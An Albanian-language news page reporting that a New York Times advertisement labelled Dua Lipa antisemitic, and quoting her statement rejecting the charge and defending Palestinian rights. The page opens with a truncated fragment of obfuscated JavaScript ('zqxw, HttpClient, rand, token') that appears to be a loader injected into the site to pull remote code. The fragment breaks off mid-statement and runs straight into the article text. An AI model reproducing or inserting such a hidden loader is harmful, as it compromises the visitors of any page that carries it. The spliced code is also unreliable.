;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dua sulmohet në ‘New York Times’: ‘Ky është çmimi që duhet paguaj për palestinezët’

By

Prestigjiozja ‘New York Times’ në hapësirën e caktuar e ka akuzuar Dua Lipën si ‘antisemite’ [armiqësore/paragjykuese ndaj hebrenjve].

Kjo marrë shkas nga qëndrimet e saj të zëshme për ngjarjet në rripin e Gazës në përkrahje të popullit palestinez. Reklama nga Rrjeti i Vlerave Botërore i referohet Lipës dhe modeleve Bella dhe Gigi Hadid si “mega-ndikuese” që kanë “përçmuar shtetin hebre” dhe “kanë akuzuar Izraelin për spastrim etnik”.

Etiketimi ka bërë që Dua të reagojë fuqishëm përmes një shkrimi të gjatë ku shprehet:

‘Unë hedh krejtësisht poshtë spekulimet e tmerrshme dhe të rreme të publikuara sot. Ky është çmimi që duhet paguar për mbrojtjen e të drejtave të palestinezëve kundrejt një qeverie izraelite aksionet e së cilës në palesinë, grupet e të drejtave të njeriut botërore dhe vet izraelite i cilësojnë si persekutim dhe diskriminim. Unë mbaj këtë qëndrim sepse besoj që të gjithë – hebrenjtë, muslimanët dhe krishterët kanë të drejtën të jetojnë në paqe si qytetarë të barabartë të shtetit që zgjedhn. Rrjeti po përdor paturpërisht emrim tim për kampanjat e tyre të shëmtuara me manipulime dhe keqinterpretime flagrante të asaj që unë jam dhe për çfarë qëndroj. Unë solidarizohem me të gjithë njerëzit e shtypur dhe i refuzoj të gjitha format e racizmit”

Artikuj të ngjashëm